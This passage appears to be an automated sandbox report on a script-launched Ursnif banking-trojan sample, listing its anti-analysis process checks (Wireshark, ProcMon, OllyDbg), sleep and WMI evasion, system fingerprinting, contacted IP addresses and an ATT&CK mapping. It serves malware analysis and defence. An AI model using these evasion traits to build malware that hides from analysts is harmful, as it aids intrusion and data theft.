            Source: wscript.exe, 00000000.00000002.473880595.000001AF6DBA5000.00000004.00000001.sdmpBinary or memory string: ERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe TID: 3632Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4136Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,5_2_0118258E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_73701E40 FindFirstFileExA,5_2_73701E40
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: regsvr32.exe, 00000005.00000002.2148791952.0000000001080000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: regsvr32.exe, 00000005.00000002.2149144554.0000000001102000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWa Connection* 6-QoS Packet Scheduler-00002t
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.1409821295.00000000010F6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F1FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_736F1FA6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_73733AA0 mov eax, dword ptr fs:[00000030h]5_2_73733AA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_737339D6 mov eax, dword ptr fs:[00000030h]5_2_737339D6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_737335E0 push dword ptr fs:[00000030h]5_2_737335E0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_73702B0E GetProcessHeap,5_2_73702B0E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F1E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,5_2_736F1E95

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: afterbirth.rs.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 47.91.16.227 80Jump to behavior
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmpBinary or memory string: RProgram Managerm
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,5_2_736F1E58
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118350A cpuid 5_2_0118350A
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F1BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,5_2_736F1BB9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0118350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,5_2_0118350A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_736F177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,5_2_736F177C
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation421Winlogon Helper DLLProcess Injection12Software Packing1Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesScripting121Network Sniffing